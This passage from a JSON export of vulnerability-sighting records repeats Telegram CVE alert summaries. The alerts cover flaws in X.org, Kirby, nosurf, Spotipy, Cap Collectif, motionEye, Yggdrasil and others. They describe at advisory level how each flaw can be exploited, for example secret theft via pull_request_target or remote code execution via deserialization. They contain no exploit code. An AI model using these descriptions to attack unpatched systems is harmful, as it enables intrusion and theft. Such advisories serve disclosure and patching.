"https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "d5c39b0d-490c-4236-b7f6-901c16f0b4c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9819", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "78091fb1-5e45-4661-928e-25dbc451a745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9540", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "269aedb7-b59c-4284-9f32-8d29e6210593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8798", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "693438db-82ba-49a4-89f5-0321f978a3e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "a6160a0e-6c57-4805-993f-313835e349a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P3P-W5JF-8XXG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30207\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N)\n\ud83d\udd39 Description: Kirby is an open-source content management system. A vulnerability in versions prior to 3.9.8.3, 3.10.1.2, and 4.7.1 affects all Kirby setups that use PHP's built-in server. Such setups are commonly only used during local development. Sites that use other server software (such as Apache, nginx or Caddy) are not affected. A missing path traversal check allowed attackers to navigate all files on the server that were accessible to the PHP process, including files outside of the Kirby installation. The vulnerable implementation delegated all existing files to PHP, including existing files outside of the document root. This leads to a different response that allows attackers to determine whether the requested file exists. Because Kirby's router only delegates such requests to PHP and does not load or execute them, contents of the files were not exposed as PHP treats requests to files outside of the document root as invalid. The problem has been patched in Kirby 3.9.8.3, Kirby 3.10.1.2, and Kirby 4.7.1. In all of the mentioned releases, the maintainers of Kirby have updated the router to check if existing static files are within the document root. Requests to files outside the document root are treated as page requests of the error page and will no longer allow to determine whether the file exists or not.\n\ud83d\udccf Published: 2025-05-13T15:20:00.707Z\n\ud83d\udccf Modified: 2025-05-13T15:20:00.707Z\n\ud83d\udd17 References:\n1. https://github.com/getkirby/kirby/security/advisories/GHSA-9p3p-w5jf-8xxg\n2. https://github.com/getkirby/kirby/releases/tag/3.10.1.2\n3. https://github.com/getkirby/kirby/releases/tag/3.9.8.3\n4. https://github.com/getkirby/kirby/releases/tag/4.7.1", "creation_timestamp": "2025-05-13T15:31:08.000000Z"}, {"uuid": "ae6739a6-1386-4c24-b149-ab06e3bbf23c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQ77-P4H8-4CRW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16215", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46721\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: nosurf is cross-site request forgery (CSRF) protection middleware for Go. A vulnerability in versions prior to 1.2.0 allows an attacker who controls content on the target site, or on a subdomain of the target site (either via XSS, or otherwise) to bypass CSRF checks and issue requests on user's behalf. Due to misuse of the Go `net/http` library, nosurf categorizes all incoming requests as plain-text HTTP requests, in which case the `Referer` header is not checked to have the same origin as the target webpage. If the attacker has control over HTML contents on either the target website (e.g. `example.com`), or on a website hosted on a subdomain of the target (e.g. `attacker.example.com`), they will also be able to manipulate cookies set for the target website. By acquiring the secret CSRF token from the cookie, or overriding the cookie with a new token known to the attacker, `attacker.example.com` is able to craft cross-site requests to `example.com`. A patch for the issue was released in nosurf 1.2.0. In lieu of upgrading to a patched version of nosurf, users may additionally use another HTTP middleware to ensure that a non-safe HTTP request is coming from the same origin (e.g. by requiring a `Sec-Fetch-Site: same-origin` header in the request).\n\ud83d\udccf Published: 2025-05-13T15:29:30.068Z\n\ud83d\udccf Modified: 2025-05-13T19:07:23.093Z\n\ud83d\udd17 References:\n1. https://github.com/justinas/nosurf/security/advisories/GHSA-w9hf-35q4-vcjw\n2. https://github.com/justinas/nosurf/commit/ec9bb776d8e5ba9e906b6eb70428f4e7b009feee\n3. https://github.com/advisories/GHSA-rq77-p4h8-4crw\n4. https://github.com/justinas/nosurf-cve-2025-46721\n5. https://github.com/justinas/nosurf/releases/tag/v1.2.0", "creation_timestamp": "2025-05-13T19:31:12.000000Z"}, {"uuid": "a5e3f024-d785-4b29-8426-937327c06de7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J93J-PWM6-P97J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19651", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53013\n\ud83d\udd25 CVSS Score: 5.2 (cvssV3_1, Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)\n\ud83d\udd39 Description: Himmelblau is an interoperability suite for Microsoft Azure Entra ID and Intune. A vulnerability present in versions 0.9.10 through 0.9.16 allows a user to authenticate to a Linux host via Himmelblau using an *invalid* Linux Hello PIN, provided the host is offline. While the user gains access to the local system, Single Sign-On (SSO) fails due to the network being down and the inability to issue tokens (due to a failure to unlock the Hello key). The core issue lies in an incorrect assumption within the `acquire_token_by_hello_for_business_key` function: it was expected to return a `TPMFail` error for an invalid Hello key when offline, but instead, a preceding nonce request resulted in a `RequestFailed` error, leading the system to erroneously transition to an offline success state without validating the Hello key unlock. This impacts systems using Himmelblau for authentication when operating in an offline state with Hello PIN authentication enabled. Rocky Linux 8 (and variants) are not affected by this vulnerability. The problem is resolved in Himmelblau version 0.9.17. A workaround is available for users who cannot immediately upgrade. Disabling Hello PIN authentication by setting `enable_hello = false` in `/etc/himmelblau/himmelblau.conf` will mitigate the vulnerability.\n\ud83d\udccf Published: 2025-06-26T18:02:31.828Z\n\ud83d\udccf Modified: 2025-06-26T18:47:31.356Z\n\ud83d\udd17 References:\n1. https://github.com/himmelblau-idm/himmelblau/security/advisories/GHSA-j93j-pwm6-p97j\n2. https://github.com/himmelblau-idm/himmelblau/commit/64b03739f1d5ee472b1cff3ed20ed9af1c65a6f8\n3. https://github.com/himmelblau-idm/himmelblau/commit/78477d684df710d57c10091c87b92665cfac98ae", "creation_timestamp": "2025-06-26T19:50:54.000000Z"}, {"uuid": "e12ab49f-10a1-4ec1-9af8-1d992f4d0046", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HF7R-RJH4-5FC8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16302", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47292\n\ud83d\udd25 CVSS Score: 9.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Cap Collectif is an online decision making platform that integrates several tools. Before commit 812f2a7d271b76deab1175bdaf2be0b8102dd198, the `DebateAlternateArgumentsResolver` deserializes a `Cursor`, allowing any classes and which can be controlled by unauthenticated user. Exploitation of this vulnerability can lead to Remote Code Execution. The vulnerability is fixed in commit 812f2a7d271b76deab1175bdaf2be0b8102dd198.\n\ud83d\udccf Published: 2025-05-14T10:44:28.478Z\n\ud83d\udccf Modified: 2025-05-14T10:44:28.478Z\n\ud83d\udd17 References:\n1. https://github.com/cap-collectif/cap-collectif/security/advisories/GHSA-hf7r-rjh4-5fc8\n2. https://github.com/cap-collectif/cap-collectif/commit/812f2a7d271b76deab1175bdaf2be0b8102dd198", "creation_timestamp": "2025-05-14T11:31:27.000000Z"}, {"uuid": "4d74fcea-62fa-4dcf-9021-f167b9706760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H25V-8C87-RVM8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16552", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47928\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Spotipy is a Python library for the Spotify Web API. As of commit 4f5759dbfb4506c7b6280572a4db1aabc1ac778d, using `pull_request_target` on `.github/workflows/integration_tests.yml` followed by the checking out the head.sha of a forked PR can be exploited by attackers, since untrusted code can be executed having full access to secrets (from the base repo). By exploiting the vulnerability is possible to exfiltrate `GITHUB_TOKEN` and secrets `SPOTIPY_CLIENT_ID`,  `SPOTIPY_CLIENT_SECRET`. In particular `GITHUB_TOKEN` which can be used to completely overtake the repo since the token has content write privileges. The `pull_request_target` in GitHub Actions is a major security concern\u2014especially in public repositories\u2014because it executes untrusted code from a PR, but with the context of the base repository, including access to its secrets. Commit 9dfb7177b8d7bb98a5a6014f8e6436812a47576f reverted the change that caused the issue.\n\ud83d\udccf Published: 2025-05-15T20:09:48.326Z\n\ud83d\udccf Modified: 2025-05-15T20:18:00.369Z\n\ud83d\udd17 References:\n1. https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-h25v-8c87-rvm8\n2. https://github.com/spotipy-dev/spotipy/commit/4f5759dbfb4506c7b6280572a4db1aabc1ac778d\n3. https://github.com/spotipy-dev/spotipy/commit/9dfb7177b8d7bb98a5a6014f8e6436812a47576f", "creation_timestamp": "2025-05-15T20:33:31.000000Z"}, {"uuid": "f18e98eb-db05-438f-84c2-784217300406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC8F-M8G5-8362", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19649", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52904\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. In version 2.32.0 of the web application, all users have a scope assigned, and they only have access to the files within that scope. The Command Execution feature of Filebrowser allows the execution of shell commands which are not restricted to the scope, potentially giving an attacker read and write access to all files managed by the server. Until this issue is fixed, the maintainers recommend to completely disable `Execute commands` for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application's configuration. As a defense-in-depth measure, organizations not requiring command execution should operate the Filebrowser from a distroless container image. A patch version has been pushed to disable the feature for all existent installations, and making it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. Fix is tracked on pull request 5199.\n\ud83d\udccf Published: 2025-06-26T18:21:03.284Z\n\ud83d\udccf Modified: 2025-06-26T19:27:42.375Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hc8f-m8g5-8362\n2. https://github.com/filebrowser/filebrowser/issues/5199\n3. https://github.com/GoogleContainerTools/distroless\n4. https://sloonz.github.io/posts/sandboxing-1", "creation_timestamp": "2025-06-26T19:50:49.000000Z"}, {"uuid": "7d9dc436-8c6a-4105-91a5-f0f6b3dd8a22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7592", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16304", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-3931\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in Yggdrasil, which acts as a system broker, allowing the processes to communicate to other children's \"worker\" processes through the DBus component. Yggdrasil creates a DBus method to dispatch messages to workers. However, it misses authentication and authorization checks, allowing every system user to call it. One available Yggdrasil worker acts as a package manager with capabilities to create and enable new repositories and install or remove packages. \n\nThis flaw allows an attacker with access to the system to leverage the lack of authentication on the dispatch message to force the Yggdrasil worker to install arbitrary RPM packages. This issue results in local privilege escalation, enabling the attacker to access and modify sensitive system data.\n\ud83d\udccf Published: 2025-05-14T11:54:50.290Z\n\ud83d\udccf Modified: 2025-05-14T11:54:50.290Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:7592\n2. https://access.redhat.com/security/cve/CVE-2025-3931\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2362345", "creation_timestamp": "2025-05-14T12:32:53.000000Z"}, {"uuid": "5642d23f-7884-44df-80e5-d8676d5fb6fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CWV-PXCR-HFJC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16291", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52290\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: LF Edge eKuiper is a lightweight internet of things (IoT) data analytics and stream processing engine. Prior to version 2.1.0 user with rights to modificate the service (e.g. kuiperUser role) can inject a cross-site scripting payload into Connection Configuration key `Name` (`confKey`) parameter. After this setup, when any user with access to this service (e.g. admin) tries to delete this key, a payload acts in the victim's browser. Version 2.1.0 fixes the issue.\n\ud83d\udccf Published: 2025-05-14T07:19:50.045Z\n\ud83d\udccf Modified: 2025-05-14T07:19:50.045Z\n\ud83d\udd17 References:\n1. https://github.com/lf-edge/ekuiper/security/advisories/GHSA-9cwv-pxcr-hfjc", "creation_timestamp": "2025-05-14T07:30:58.000000Z"}, {"uuid": "f2786978-094a-444e-be13-a44325f4db62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5MQ-PRX7-C588", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16329", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47782\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: motionEye is an online interface for the software motion, a video surveillance program with motion detection. In versions 0.43.1b1 through 0.43.1b3, using a constructed (camera) device path with the `add`/`add_camera` motionEye web API allows an attacker with motionEye admin user credentials to execute any command within a non-interactive shell as motionEye run user, `motion` by default. The vulnerability has been patched with motionEye v0.43.1b4. As a workaround, apply the patch manually.\n\ud83d\udccf Published: 2025-05-14T15:54:59.309Z\n\ud83d\udccf Modified: 2025-05-14T15:54:59.309Z\n\ud83d\udd17 References:\n1. https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g5mq-prx7-c588\n2. https://github.com/motioneye-project/motioneye/issues/3142\n3. https://github.com/motioneye-project/motioneye/pull/3143", "creation_timestamp": "2025-05-14T16:33:47.000000Z"}, {"uuid": "212ee12b-61b8-4be6-a0ef-a18859e7d840", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://gist.github.com/konard/b4fdbcec737f21f5f1a690e8c86a6713", "content": "", "creation_timestamp": "2026-04-27T21:04:47.000000Z"}, {"uuid": "a0a23851-f41e-4c84-90e5-9fe86a86b635", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r4q5-vmmm-2653", "type": "seen", "source": "https://gist.github.com/konard/b4fdbcec737f21f5f1a690e8c86a6713", "content": "", "creation_timestamp": "2026-04-27T21:04:47.000000Z"}, {"uuid": "be4bb406-a6c9-449a-ba3e-527f331804d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p68-rc4w-qgx5", "type": "seen", "source": "https://gist.github.com/konard/b4fdbcec737f21f5f1a690e8c86a6713", "content": "", "creation_timestamp": "2026-04-27T21:04:47.000000Z"}, {"uuid": "bbd7843a-78a5-497f-a370-8a4574c6ca4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f886-m6hf-6m8v", "type": "seen", "source": "https://gist.github.com/konard/a382119a83c3810614e002634a056ade", "content": "", "creation_timestamp": "2026-04-27T22:32:44.000000Z"}, {"uuid": "c07c0bee-6669-470e-97fd-d48c0b76bd8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://gist.github.com/konard/a382119a83c3810614e002634a056ade", "content": "", "creation_timestamp": "2026-04-27T22:32:44.000000Z"}, {"uuid": "22626d0b-add5-4766-bfed-9d45c84e81ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r4q5-vmmm-2653", "type": "seen", "source": "https://gist.github.com/konard/a382119a83c3810614e002634a056ade", "content": "", "creation_timestamp": "2026-04-27T22:32:44.000000Z"}, {"uuid": "9ef1f23c-4ee1-4e46-b5d2-de3aa0754224", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p68-rc4w-qgx5", "type": "seen", "source": "https://gist.github.com/konard/a382119a83c3810614e002634a056ade", "content": "", "creation_timestamp": "2026-04-27T22:32:44.000000Z"}, {"uuid": "a6b9683d-c50f-4db6-89e6-a4b557665822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ch2-jxxc-v4xf", "type": "seen", "source": "https://gist.github.com/beejak/c190bcb8f8b76e8b2200faef11e807d6", "content": "", "creation_timestamp": "2026-04-28T04:41:41.000000Z"}, {"uuid": "9ad16250-8abc-43a4-a88a-52e4b94b3a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ch2-jxxc-v4xf", "type": "seen", "source": "https://gist.github.com/beejak/235d9793985eef4870d4d4fe221cc6fe", "content": "", "creation_timestamp": "2026-04-28T05:20:25.000000Z"}, {"uuid": "b5acf4b2-f1fb-4de3-8b17-b35f31efe11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wg4g-395p-mqv3", "type": "seen", "source": "https://gist.github.com/alon710/0c93b9f92c40153c15c84b6730dd51ac", "content": "", "creation_timestamp": "2026-04-28T06:40:29.000000Z"}, {"uuid": "46508efe-420d-40de-9810-1aa7e3388289", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-74m3-9qvm-rp9h", "type": "seen", "source": "https://gist.github.com/alon710/88fd2e850268852a0a0d536e453359e1", "content": "", "creation_timestamp": "2026-04-28T10:10:28.000000Z"}, {"uuid": "1991befb-82ef-4394-a8e5-d90613eef916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-x2qx-6953-8485", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3mkkjx4rbxg2s", "content": "", "creation_timestamp": 